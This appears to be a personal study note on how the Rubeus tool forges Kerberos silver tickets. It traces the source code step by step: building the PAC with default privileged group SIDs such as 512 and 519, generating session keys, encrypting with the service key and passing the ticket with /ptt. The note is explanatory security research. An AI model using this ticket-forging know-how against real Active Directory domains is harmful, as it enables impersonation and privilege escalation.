#silver
During Rubeus.exe!Rubeus.ForgeTickets.ForgeTicket() // initialise LogonInfo section and set defaults , LogonInfo (kvi). Will hardcode some groupIDs into it ![[Pasted image 20220812213351.png]]
Rubeus.Interop.PacUserAccountControl.NORMAL_ACCOUNT = 16;
Side Note: When using golden ticket it is best to use domain controller's account. And extrasids
KRB_CRED cred = new KRB_CRED();
When forging a silver ticket, Rubeus will Forge the TGS-REP ticket manually (using forgetickets.forgeticket() ). the kvi variable is used to record the var kvi = Ndr._KERB_VALIDATION_INFO.CreateDefault(); which includes UserSid( if not specified, its 500), UserGroupSIDs(if not specified, it's PrimaryGroupSid 513, if no other groups specified with /groups, it will add group 520,512,513,519,518 by default). And if ldap is specified, it will set all the user account information for us into the PAC ( think of PAC is a way to store all client information, logon script, password_expire, SIDs). After finishing the PAC , generate a random Session key according to etype ( if it is rc4, sessionkey.length=16, it's aes256, then sessionkey.lenth=32). Next, it will try to determine the krbkey which is what krbtgt is using, knowing we are forging a TGS-REP. the krbkey won't matter here, since we are sending the ticket directly to service. After everything is finished EncTicketPart decTicketPart = new EncTicketPart(randKeyBytes, etype, cRealm.ToUpper(), cName, flags, cn.ClientId); to create the basic framework of the ticket prior to encryption and adding the last peices(authoriation_placeholder, endtime.). And It will generate some a nullbyte for the structure inside of the authoriation_placeholder. Calculate the checksum for this ticket using krbkey again, I don't think this matters now since the service check with kdc is not enabled by default. (we just have to put it there). ==end of PAC and basic ticket initialazation ==
Now comes to signing the PAC . Rubeus uses a list named PacInfoBuffers to store all the information for the pac, it will add the kvi, cn, upnDNS, svrSigData,KdcSigData's checksum(signature) and added to the previous intialized ticket structure. which containing session key and cname. When that's finished, it will finally encrypt the whole ticket with the serviceKey that is provided by the user. ==keep in mind this is the application layer of the ticket, so we still need to provide the kerberos headers in the packet to send it to kdc== .
We can do that by intializing Ticket ticket = new Ticket(domain.ToUpper(), sname); and add our encrypted service ticket to ticket.enc_part = new EncryptedData((Int32)etype, encTicketPart, 3); . And add the ticket structure to cred (KRB_CRED() struct, out final final data used by lsass.exe), and then add in the session key that was previously putted into the decTicketPart(not sure why it's called decticketPart, maybe it's not yet encrypted) to info (clear_text information about the AP_REQ request.). Add pname (which is just cname) and renewal_time etc... to creds.encpart.ticket_info. Finally, /ptt